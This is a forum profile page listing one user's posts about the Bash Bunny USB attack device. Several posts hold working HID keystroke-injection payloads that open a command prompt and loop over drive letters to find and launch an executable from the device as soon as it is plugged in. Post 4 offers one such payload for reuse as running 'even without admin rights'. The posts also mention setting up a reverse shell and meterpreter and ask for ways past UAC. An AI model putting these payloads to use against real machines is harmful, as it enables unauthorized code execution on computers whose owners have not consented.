Jump to content

hoppler

Active Members
  • Content Count

    8
  • Joined

  • Last visited

About hoppler

  • Rank
    Hackling

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Well, I'll answer myself, before somebody else runs into the same problems thinking the Firmware doesn't work. Here's the little story: I installed Firmware 1.6. So far, so good. But when I logged into the Bash Bunny I could only see : "udisk" and "Version.txt". Before I made the update I could see something like "ATTACKMODE", "TOOLS" and many other Directorys/Files. After I installed the new Firmware 1.6. there was only what I mentioned above. Well, I'm not good with linux, but I'm not a quitter. so I started digging deeper into the BB. And I got the clue! The filesystem has changed!!! Now I have to do a " cd .." to see the files installed in the BB. Important: See the space between "cd" and "..". I got metasploit installed, responder, but gohttp will be ignored. I put the files into the Tools folder - it shows magenta light, so it is installing, but no gohttp - I need it for a reverse shell. Why I can't install gohttp ??? Well, I don't know if Mr Darren Kitchen is still around. But if he is, I would like to tell him: Please, Mr. Kitchen, if you are still working on hak5 I need your help! The Bash Bunny is a great Tool for pentesters, but unfortunally there seems to be no help, or at least very few help, to get bpayloads started. Most of the payloads on github don't work anymore. And I'm not satisfied with it. A video showing that the BB can show a message when plugged in or change the wallpaper (big Deal) isn't something a pentester needs to know. I don't know if you still interested in the development of payloads for the BB. But if you do, you might want to make some tutorials - this is better then showing any uninterested stuff on hak5 for the BB. I guess you have to be serious and not presenting anything like "I can change your wallpaper if you plugin you BB". Wow, big deal! No, I guess the community have to wake up! Where is the challenge? Were are the programmers who can defeat let's say UAC? Most of the stuff shown isn't very intersting - for more than 30 minutes - yawn!!! Hey, guys, wake up!!!!!!!!!!!!!!!!!!!!!!!!
  2. I used the Bunnyupdater on a windows Machine to update my BB to the new Firmware 1.6. Then I tried to install the Tools by copy the .deb files to the Tools Folder. Save ejecting and reinseting. Everything seems to be o.k., BUT when I log into to linux Terminal of the BB via Putty I just have ONE Folder "udisk" and a "version.txt" File. What's wrong here??? Please help.
  3. Hello everybody, I'm a proud owner of the Bash Bunny. Well, I read recently that there was an update. So the BB is capable of running metasploit. Great! But now: How do I use it? Besides: I've seen a video where somebody pluged in the BB and almost instantly there was a Linux Terminal, running from BB. Is THIS possible and if, how can I do that? It would be really great if somebody could do a step by step tutorial. Because I'm wondering if it's possible to run Kali Linux (especially meterpreter) instantly from the BB? I'm a neewbie, but I would like to learn, with the help of you guys, how to run with the full potential of the BB. Thanks in advance. Mister Darren Kitchen you are invited,too, to join this thread.
  4. Wow, thank you for this straight answer. Now I get the picture. But I figured out a way to run an executable through command - even without admin rights. Maybe somebody could use it. Here is my solution: Note: if you need different keyboard layout, add this: DUCKY_LANG gb - or anything else Payload.txt: ATTACKMODE HID STORAGE LED R SLOW Q GUI r Q DELAY 500 Q STRING cmd Q ENTER Q DELAY 500 Q STRING "for /l %a in (0) do ( for %a in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do if exist %a:/my_folder/my.exe (start %a:/my_folder/my.exe & exit) )" Q ENTER LED OFF Weel, it's actually very simple - which runs on any Windows Machine. How does it work? 1. Create a folder on the BB Storage or any other Storage with the Name: my_folder (you can name it like you want) 2. Put an executable File in the above folder (e.g. my.exe). 3. Copy the above Code into the payload.txt of switch 1 or switch 2. 4. Thats's all. As soon as you insert the BB it starts the HID Attack. The BB opens a cmd window and runs an infinty loop searching the file. If the the file exists it executes the exe file and exits the cmd window. Simple but effective. Ok, that's one way to achive my goal, running an executable from an external storage. But now I would like to know how you guys would run an executable from the BB. Any attack mode is allowed - so please give me your ideas and payloads. It would be great if OS starts from Windows XP on, but from Windows 7 on is fine, too. Let's make a challenge out of this! Because Many people, many toughts, results in many solutions. Hope you guys have a great day!!!
  5. Hello. I have following payload: LED SETUP ATTACKMODE HID STORAGE GET SWITCH_POSITION LED ATTACK if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/my_script.txt" ]; then QUACK ${SWITCH_POSITION}/my_script.txt LED FINISH fi Well, my_script.txt get's executed. Great. But now my question: Why it is'nt working if I change "my_script.txt" to "my_script.exe". if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/my_script.exe" ]; then QUACK ${SWITCH_POSITION}/my_script.exe LED FINISH fi Or is there a nother easy way to execute the .exe file without going through powershell or cmd? Maybe through Ethernet??? An example or actually an answer would be great. Maybe Darren could help??? Thanks in advance
  6. hoppler

    Somethings wrong

    Well I guess I have to answer my own question. Q DELAY 500Q STRING for %d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do if exist %d:/payload/switch1/test.exe (start %d:/payload/switch1/test.exe & exit)Q ENTER Problem was: Double quotes are missing: Q DELAY 500Q STRING "for %d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do if exist %d:/payload/switch/test.exe (start %d:/payload/switch/test.exe & exit)"Q ENTER And now it runs smoothly. Thanks to myself.
  7. hoppler

    Somethings wrong

    Sorry, code got messed up: Here the right one: ATTACKMODE HID STORAGE Q GUI r Q DELAY 500 Q STRING cmd Q ENTER LED Y Q DELAY 500 Q STRING for %d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do if exist %d:/payload/switch/test.exe (start %d:/payload/switch/test.exe & exit) Q ENTER LED W
  8. Hello, first of all, I am a proud owner of the Bash Bunny. So far so good, but there are a problem I can not resolve. I have a payload in switch 1: ATTACKMODE HID STORAGE Q GUI r Q DELAY 500 Q DELAY 500 Q STRING cmd Q ENTER Q DELAY 500 for %d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do if exist %d:/payload/switch/test.exe (start %d:/payload/switch/test.exe & exit) Q ENTER If I put this manuallz in the cmd window everzthing works fine. But if I start the BB it does not write the line for..... What do I want to achive? I placed an exe file in the payload folder. And I just want to start this exe file by inserting the BB. Because I do not know the drive I want to loop throug the availlable drives and start the exe if it was found an exit the cmd. And even this does not work. I am on Windows XP and there is no powershell availlable. So I want to use plain old DOS stuff. And besides: Yes, I upgraded the BB to the latest firmware. So now my questions: 1. Why the BB stops on the string with the loop? 2. Is there a way to find the file in drive and execute this file? 3. Are there "forbidden" commands? Any help to achive my goal would be really appreciated. Sorry for my bad english, but I am a bit rosty. Thanks in advance for help. best regards
×
×
  • Create New...